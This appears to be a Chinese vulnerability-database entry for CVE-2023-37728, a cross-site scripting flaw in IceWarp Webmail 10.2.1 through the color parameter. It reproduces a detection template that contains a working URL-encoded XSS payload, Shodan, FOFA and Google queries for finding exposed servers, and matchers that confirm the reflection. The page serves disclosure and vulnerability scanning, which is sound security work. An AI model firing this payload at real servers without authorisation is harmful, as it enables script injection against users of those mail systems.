CVE-2023-37728: IceWarp Webmail Server v10.2.1 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: IceWarp Webmail Server | POC: 已公开

漏洞描述

Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.

PoC代码[已公开]

id: CVE-2023-37728

info:
  name: IceWarp Webmail Server v10.2.1 - Cross Site Scripting
  author: technicaljunkie,r3Y3r53
  severity: medium
  description: |
    Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
  reference:
    - https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37728
    - http://icearp.com
    - http://icewarp.com
    - https://medium.com/%40ayush.engr29/cve-2023-37728-6dfb7586311
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-37728
    cwe-id: CWE-79
    epss-score: 0.11915
    epss-percentile: 0.93509
    cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: icewarp
    product: icewarp
    shodan-query:
      - http.favicon.hash:2144485375
      - http.title:"icewarp"
    fofa-query:
      - title="icewarp"
      - icon_hash=2144485375
    google-query: intitle:"icewarp"
  tags: cve,cve2023,icearp,icewarp,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
      - "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
          - 'contains(body, "<img src onerror=alert(document.domain)>")'
        condition: and
# digest: 4a0a0047304502200949935f468275b0b42f2785608501cb95ad35fb02115b64bf3f64823ef50fc1022100ca8e06061efb9e297460139fce9bb1531ce45f4ae4f715a6c9d256f8f9a5f237:922c64590222798bb761d5b6d8e72950

相关漏洞推荐